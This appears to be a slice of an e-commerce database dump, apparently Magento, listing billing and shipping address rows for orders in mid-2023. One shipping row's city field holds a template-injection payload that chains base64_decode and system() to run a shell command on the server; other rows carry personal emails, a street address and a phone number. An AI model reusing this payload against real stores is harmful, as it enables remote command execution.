(226, 108, '2023-06-27 20:17:28', '2023-06-27 20:17:28', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(227, 109, '2023-07-04 19:34:09', '2023-07-04 19:34:09', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(228, 109, '2023-07-04 19:34:09', '2023-07-04 19:34:09', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(229, 110, '2023-07-11 16:32:06', '2023-07-11 16:32:06', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(230, 110, '2023-07-11 16:32:06', '2023-07-11 16:32:06', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 2.0000, 108.0000, 108.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, NULL, '[]', NULL, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(231, 111, '2023-07-17 15:19:38', '2023-07-17 15:19:38', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(232, 111, '2023-07-17 15:19:38', '2023-07-17 15:19:38', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 2.0000, 108.0000, 108.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, NULL, '[]', NULL, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(233, 112, '2023-08-02 01:16:27', '2023-08-02 01:16:27', 69, 0, NULL, 'billing', 'ale.x.a.ndra.go.no.s.t.ae.va@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(234, 112, '2023-08-02 01:16:27', '2023-08-02 01:16:27', 69, 0, NULL, 'shipping', 'ale.x.a.ndra.go.no.s.t.ae.va@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(235, 113, '2023-08-02 19:40:35', '2023-08-02 19:40:35', 70, 0, NULL, 'billing', 'ale.x.a.ndrag.on.o.st.aeva@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(236, 113, '2023-08-02 19:40:35', '2023-08-02 19:40:35', 70, 0, NULL, 'shipping', 'ale.x.a.ndrag.on.o.st.aeva@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(237, 114, '2023-08-03 17:48:36', '2023-08-03 17:48:36', 71, 0, NULL, 'billing', 'ale.x.an.d.rag.ono.s.t.aeva@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(238, 114, '2023-08-03 17:48:36', '2023-08-03 17:48:36', 71, 0, NULL, 'shipping', 'ale.x.an.d.rag.ono.s.t.aeva@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(239, 115, '2023-08-04 18:33:12', '2023-08-04 18:33:12', 72, 0, NULL, 'billing', 'al.exan.dra.g.o.n.os.t.a.e.v.a@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(240, 115, '2023-08-04 18:33:12', '2023-08-04 18:33:12', 72, 0, NULL, 'shipping', 'al.exan.dra.g.o.n.os.t.a.e.v.a@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(241, 116, '2023-08-05 00:46:20', '2023-08-05 00:46:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(242, 116, '2023-08-05 00:46:20', '2023-08-05 00:46:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(243, 117, '2023-08-05 00:47:29', '2023-08-05 00:47:29', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(244, 117, '2023-08-05 00:47:29', '2023-08-05 00:47:29', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(245, 118, '2023-08-05 11:37:13', '2023-08-05 11:37:13', 73, 0, NULL, 'billing', 'al.e.x.a.nd.r.a.gon.o.s.taeva@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(246, 118, '2023-08-05 11:37:13', '2023-08-05 11:37:13', 73, 0, NULL, 'shipping', 'al.e.x.a.nd.r.a.gon.o.s.taeva@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(247, 119, '2023-08-12 01:27:48', '2023-08-12 01:27:48', 74, 0, NULL, 'billing', 'al.e.x.a.nd.r.a.g.on.o.st.a.eva@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(248, 119, '2023-08-12 01:27:48', '2023-08-12 01:27:48', 74, 0, NULL, 'shipping', 'al.e.x.a.nd.r.a.g.on.o.st.a.eva@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(249, 121, '2023-08-12 08:41:30', '2023-08-12 08:41:30', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(250, 121, '2023-08-12 08:41:30', '2023-08-12 08:41:30', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(251, 307, '2023-08-13 11:42:06', '2023-08-13 11:42:06', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(252, 307, '2023-08-13 11:42:06', '2023-08-13 11:42:06', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 2.0000, 108.0000, 108.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, NULL, '[]', NULL, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(253, 308, '2023-08-13 12:28:37', '2023-08-13 12:28:37', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(254, 308, '2023-08-13 12:28:37', '2023-08-13 12:28:37', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 2.0000, 108.0000, 108.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, NULL, '[]', NULL, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(255, 309, '2023-08-14 13:10:54', '2023-08-14 13:10:54', NULL, 0, NULL, 'billing', NULL, NULL, '1', NULL, '1', NULL, NULL, '3001 W OLD YANKTON RD', 'San Francisco', 'California', 12, '94123', 'US', '6309918051', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(256, 309, '2023-08-14 13:10:54', '2023-08-14 13:11:03', NULL, 0, NULL, 'shipping', NULL, NULL, 'Jospeh', NULL, 'addAfterFilterCall', NULL, NULL, '3001 W OLD YANKTON RD', 'city {{if this.getTemplateFilter().{{var lastname}}back(base64_decode).{{var lastname}}back(system).Filter(bHMgLWFs)}}lname{{/if}}', 'California', 12, '94123', 'US', '6309918051', NULL, 0, 0, 'tablerate_bestway', 'Best Way - Table Rate', 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(257, 310, '2023-08-16 10:05:14', '2023-08-16 10:05:14', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(258, 310, '2023-08-16 10:05:14', '2023-08-16 10:05:14', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(259, 311, '2023-08-16 18:20:35', '2023-08-16 18:20:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(260, 311, '2023-08-16 18:20:35', '2023-08-16 18:20:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(261, 312, '2023-08-17 11:54:35', '2023-08-17 11:54:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(262, 312, '2023-08-17 11:54:35', '2023-08-17 11:54:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 2.0000, 108.0000, 108.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, NULL, '[]', NULL, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(263, 313, '2023-08-17 12:00:39', '2023-08-17 12:00:39', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(264, 313, '2023-08-17 12:00:39', '2023-08-17 12:00:39', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 2.0000, 108.0000, 108.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, NULL, '[]', NULL, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(265, 314, '2023-08-18 02:18:36', '2023-08-18 02:18:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(266, 314, '2023-08-18 02:18:36', '2023-08-18 02:18:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(267, 315, '2023-08-18 02:18:37', '2023-08-18 02:18:37', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(268, 315, '2023-08-18 02:18:37', '2023-08-18 02:18:37', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(269, 316, '2023-08-20 05:41:05', '2023-08-20 05:41:05', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(270, 316, '2023-08-20 05:41:05', '2023-08-20 05:41:05', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 2.0000, 108.0000, 108.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, NULL, '[]', NULL, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
